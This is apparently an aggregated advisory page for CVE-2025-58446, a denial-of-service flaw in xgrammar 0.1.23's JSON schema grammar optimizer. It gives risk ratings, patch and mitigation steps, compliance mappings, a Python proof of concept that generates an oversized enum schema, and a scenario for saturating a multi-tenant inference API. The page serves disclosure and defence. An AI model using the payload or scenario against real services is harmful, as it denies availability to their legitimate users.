CVE-2025-58446: xgrammar: DoS via oversized JSON schema grammar parsing

GHSA-9q5r-wfvf-rr7f MEDIUM PoC AVAILABLE CISA: TRACK*
Published September 5, 2025
CISO Take

xgrammar v0.1.23 has a DoS vulnerability where crafted large JSON schemas (>100k chars) trigger a pathologically slow grammar optimizer, blocking model inference for minutes per request. Any model serving endpoint that accepts user-defined JSON schemas for constrained/structured output is directly exploitable with a trivial PoC. Patch to v0.1.24 immediately; if delayed, enforce schema byte-size limits at the API gateway before requests reach the inference layer.

What is the risk?

Effective risk is medium-high for exposed inference endpoints, despite the medium severity rating (no CVSS score has been assigned). The attack surface is any API that accepts caller-supplied JSON schemas for structured generation, a common pattern in agentic and enterprise LLM deployments. EPSS is very low (0.00091), suggesting no current active exploitation, but the PoC is fully public and requires zero AI/ML expertise to execute. The impact is on availability, not confidentiality: a single malicious request can monopolize an inference thread for minutes, enabling throughput starvation against multi-tenant or high-availability deployments.

What systems are affected?

Package     Ecosystem   Vulnerable Range   Patched
XGrammar    pip         = 0.1.23           0.1.24

Do you use XGrammar? You're affected.
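
A quick way to check a given environment against the table above is to read the installed package version. The following is a minimal sketch, assuming the distribution is installed under the name `xgrammar`; the helper names `xgrammar_status` and `installed_xgrammar_version` are hypothetical and not part of any library.

```python
from importlib.metadata import PackageNotFoundError, version
from typing import Optional

# Only 0.1.23 is listed as vulnerable in the table above.
VULNERABLE_VERSIONS = {"0.1.23"}


def xgrammar_status(installed: Optional[str]) -> str:
    """Classify an installed version string against the listed vulnerable range."""
    if installed is None:
        return "not installed"
    if installed in VULNERABLE_VERSIONS:
        return "vulnerable: upgrade to 0.1.24 or later"
    return "not in the listed vulnerable range"


def installed_xgrammar_version() -> Optional[str]:
    """Return the installed xgrammar version, or None if it is absent."""
    try:
        return version("xgrammar")
    except PackageNotFoundError:
        return None


print(xgrammar_status(installed_xgrammar_version()))
```

This only inspects the current Python environment; container images and vendored copies would need to be checked separately.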

How severe is it?

CVSS 3.1: N/A
EPSS: 0.5% chance of exploitation in 30 days (higher than 38% of all CVEs)
Exploitation Status: Exploit Available
Exploitation: MEDIUM
Sophistication: Trivial
Exploitation Confidence: medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What should I do?

5 steps
  1. Patch

    Upgrade xgrammar to v0.1.24 or later. The fix speeds up the grammar optimizer and disables some slow optimizations for large grammars.

  2. Short-term workaround

    Enforce a maximum schema size limit (e.g., 50KB) at the API gateway or application layer before calling Grammar.from_json_schema().

  3. Rate limiting

    Apply per-client rate limiting on constrained generation endpoints, independent of token-based limits.

  4. Detection

    Alert on grammar parsing durations exceeding 10 seconds — this is anomalous and indicative of exploitation.

  5. Audit exposure

    Identify all internal services or APIs that accept caller-supplied JSON schemas and pass them directly to xgrammar without validation.
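
Steps 2 and 4 can be combined in a thin wrapper around the grammar compilation call. The sketch below is illustrative only: `compile_schema_guarded`, `SchemaTooLargeError`, and the logger name are hypothetical, and the compile function is passed in as a parameter so the wrapper does not depend on a specific xgrammar signature. The 50 KB and 10 second values are the examples from the steps above, not recommended defaults.

```python
import logging
import time
from typing import Any, Callable

logger = logging.getLogger("schema_guard")

MAX_SCHEMA_BYTES = 50_000     # example limit from step 2; tune per workload
SLOW_COMPILE_SECONDS = 10.0   # alert threshold from step 4


class SchemaTooLargeError(ValueError):
    """Raised when a caller-supplied schema exceeds the size limit."""


def compile_schema_guarded(
    schema_json: str,
    compile_fn: Callable[[str], Any],
    max_bytes: int = MAX_SCHEMA_BYTES,
    slow_seconds: float = SLOW_COMPILE_SECONDS,
) -> Any:
    """Reject oversized schemas, then time the compilation and log slow runs."""
    size = len(schema_json.encode("utf-8"))
    if size > max_bytes:
        raise SchemaTooLargeError(f"schema is {size} bytes; limit is {max_bytes}")
    start = time.monotonic()
    try:
        return compile_fn(schema_json)
    finally:
        elapsed = time.monotonic() - start
        if elapsed > slow_seconds:
            logger.warning(
                "grammar compilation took %.1fs for a %d-byte schema", elapsed, size
            )
```

In a real service, `compile_fn` would presumably wrap the call to `Grammar.from_json_schema()`. Note that the timing check only fires after compilation returns, so it detects slow schemas but does not interrupt them; the size check is what actually prevents the slow path.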

What does CISA's SSVC say?

Decision: Track*
Exploitation: poc
Automatable: Yes
Technical Impact: partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2.6 - AI system operation and monitoring
A.8.4 - AI system resources
NIST AI RMF
MANAGE-2.4 - Risks and benefits of the AI system are communicated to relevant AI actors
MEASURE-2.5 - AI system to be deployed satisfies its requirements for availability
OWASP LLM Top 10
LLM04 - Model Denial of Service

Frequently Asked Questions

Is CVE-2025-58446 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-58446, increasing the risk of exploitation.

How to fix CVE-2025-58446?

1. **Patch**: Upgrade xgrammar to v0.1.24 or later. The fix speeds up the grammar optimizer and disables some slow optimizations for large grammars.
2. **Short-term workaround**: Enforce a maximum schema size limit (e.g., 50KB) at the API gateway or application layer before calling Grammar.from_json_schema().
3. **Rate limiting**: Apply per-client rate limiting on constrained generation endpoints, independent of token-based limits.
4. **Detection**: Alert on grammar parsing durations exceeding 10 seconds, which is anomalous and may indicate exploitation.
5. **Audit exposure**: Identify all internal services or APIs that accept caller-supplied JSON schemas and pass them directly to xgrammar without validation.

What systems are affected by CVE-2025-58446?

This vulnerability affects the following AI/ML architecture patterns: model serving, structured output pipelines, LLM inference APIs, agentic tool-calling pipelines.

What is the CVSS score for CVE-2025-58446?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

model serving, structured output pipelines, LLM inference APIs, agentic tool-calling pipelines

MITRE ATLAS Techniques

AML.T0029 Denial of AI Service
AML.T0034 Cost Harvesting
AML.T0049 Exploit Public-Facing Application

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.6.2.6, A.8.4
NIST AI RMF: MANAGE-2.4, MEASURE-2.5
OWASP LLM Top 10: LLM04

What are the technical details?

Original Advisory

### Summary

The provided grammar would fit in the context window of most models, but takes minutes to process in 0.1.23. In testing with 0.1.16 the parser worked fine, so this seems to be a regression caused by the Earley parser.

### Details

A full reproducer is provided in the PoC section. The resulting grammar is around 70k tokens, and the grammar parsing itself (with the models I checked) took significantly longer than the LLM processing, meaning this can be used to DoS model providers.

### Patch

This problem is caused by the grammar optimizer introduced in v0.1.23 being too slow. It only happens for very large grammars (>100k characters), like the one below. v0.1.24 solved this problem by speeding up the grammar optimizer and disabling some slow optimizations for large grammars.

Thanks to @Seven-Streams

### PoC

```
import random
import string

def enum_schema(size=10000, str_len=10):
    # One enum of `size` random uppercase strings, referenced by eight properties.
    enum = {"enum": ["".join(random.choices(string.ascii_uppercase, k=str_len)) for _ in range(size)]}
    schema = {
        "definitions": {"colorEnum": enum},
        "type": "object",
        "properties": {
            "color1": {"$ref": "#/definitions/colorEnum"},
            "color2": {"$ref": "#/definitions/colorEnum"},
            "color3": {"$ref": "#/definitions/colorEnum"},
            "color4": {"$ref": "#/definitions/colorEnum"},
            "color5": {"$ref": "#/definitions/colorEnum"},
            "color6": {"$ref": "#/definitions/colorEnum"},
            "color7": {"$ref": "#/definitions/colorEnum"},
            "color8": {"$ref": "#/definitions/colorEnum"},
        },
        "required": ["color1", "color2"],
    }
    return schema

# test_schema is the helper defined in the next block; define it before running this part.
schema_enum = enum_schema()
print(schema_enum)
print(test_schema(schema_enum, {}))
```

where:

```
import json

import xgrammar as xgr
# Helper from xgrammar's testing utilities (import path assumed; not shown in the advisory).
from xgrammar.testing import _is_grammar_accept_string

def test_schema(schema, instance):
    # Building the grammar is the slow step on 0.1.23.
    grammar = xgr.Grammar.from_json_schema(
        json.dumps(schema),
        strict_mode=True
    )
    return _is_grammar_accept_string(grammar, json.dumps(instance))
```

### Impact

DoS
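
To relate the PoC to the ">100k characters" threshold and to the 50KB example limit in the remediation steps, it helps to measure the serialized size of the schema the PoC generates. The sketch below rebuilds the same schema shape in a more compact form (the dictionary comprehension is a rewrite for brevity, not the advisory's code) and does not require xgrammar.

```python
import json
import random
import string


def enum_schema(size=10000, str_len=10):
    # Same shape as the advisory's PoC: one large enum referenced by eight properties.
    enum = {
        "enum": [
            "".join(random.choices(string.ascii_uppercase, k=str_len))
            for _ in range(size)
        ]
    }
    return {
        "definitions": {"colorEnum": enum},
        "type": "object",
        "properties": {
            f"color{i}": {"$ref": "#/definitions/colorEnum"} for i in range(1, 9)
        },
        "required": ["color1", "color2"],
    }


serialized = json.dumps(enum_schema())
schema_chars = len(serialized)
print(f"{schema_chars} characters")
```

With the default arguments, the enum list alone serializes to 140,000 characters (10,000 quoted 10-letter strings plus separators and brackets), so the full schema is well above both the 100k-character threshold and a 50KB gateway limit.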

Exploitation Scenario

An adversary targeting a multi-tenant LLM API (e.g., an enterprise copilot or structured data extraction service) crafts a JSON schema with thousands of enum values totaling over 100k characters — trivially generated with the public PoC. They submit this as the response_format schema in a constrained generation request. The xgrammar optimizer enters a slow computation path, blocking the inference thread for several minutes. By issuing a small number of concurrent requests (5–10), the attacker can saturate all inference workers, causing complete service unavailability for legitimate users. The attack costs pennies in compute and requires no authentication bypass or specialized knowledge, only awareness of the library version and the public PoC.
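
The saturation claim can be made concrete with a back-of-envelope calculation: if each malicious request blocks one worker for a fixed time, the request rate needed to keep every worker busy is the worker count divided by the blocking time. The numbers below (8 workers, 3 minutes per request) are hypothetical and chosen only to illustrate the arithmetic; the function name is also an assumption.

```python
def saturating_requests_per_minute(workers: int, block_seconds: float) -> float:
    """Request rate that keeps every worker busy when each request
    occupies one worker for block_seconds."""
    if workers <= 0 or block_seconds <= 0:
        raise ValueError("workers and block_seconds must be positive")
    return workers * 60.0 / block_seconds


# Hypothetical deployment: 8 inference workers, each blocked for 3 minutes per request.
rate = saturating_requests_per_minute(workers=8, block_seconds=180)
print(f"{rate:.2f} requests/minute")
```

Under these assumptions, fewer than three requests per minute would be enough to hold all workers, which is why a per-client limit on constrained generation requests has to be much stricter than a typical token-based quota.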

Weaknesses (CWE)

CWE-770 — Allocation of Resources Without Limits or Throttling: The product allocates a reusable resource or group of resources on behalf of an actor without imposing any intended restrictions on the size or number of resources that can be allocated.

  • [Requirements] Clearly specify the minimum and maximum expectations for capabilities, and dictate which behaviors are acceptable when resource allocation reaches limits.
  • [Architecture and Design] Limit the amount of resources that are accessible to unprivileged users. Set per-user limits for resources. Allow the system administrator to define these limits. Be careful to avoid CWE-410.

Source: MITRE CWE corpus.
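
The per-user limits recommended under CWE-770 above could take the form of a per-client token bucket in front of the constrained generation endpoint. The following is a minimal single-process sketch: the class name `PerClientLimiter`, its defaults, and the client ID scheme are all hypothetical, and it is not thread-safe as written.

```python
import time
from typing import Callable, Dict, Tuple


class PerClientLimiter:
    """Token bucket per client ID; names and limits are illustrative."""

    def __init__(
        self,
        capacity: int = 5,
        refill_per_second: float = 0.1,
        clock: Callable[[], float] = time.monotonic,
    ) -> None:
        self.capacity = capacity
        self.refill_per_second = refill_per_second
        self.clock = clock
        # client_id -> (remaining tokens, time of last update)
        self._buckets: Dict[str, Tuple[float, float]] = {}

    def allow(self, client_id: str) -> bool:
        """Consume one token for client_id if available; return whether the request may proceed."""
        now = self.clock()
        tokens, last = self._buckets.get(client_id, (float(self.capacity), now))
        # Refill in proportion to elapsed time, capped at capacity.
        tokens = min(self.capacity, tokens + (now - last) * self.refill_per_second)
        if tokens >= 1.0:
            self._buckets[client_id] = (tokens - 1.0, now)
            return True
        self._buckets[client_id] = (tokens, now)
        return False
```

A request handler would call `allow(client_id)` before compiling any caller-supplied schema and return an error such as HTTP 429 when it yields `False`. A multi-worker deployment would need shared state (for example at the API gateway) rather than this in-memory dictionary.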

Timeline

Published: September 5, 2025
Last Modified: September 10, 2025
First Seen: March 24, 2026

Related Vulnerabilities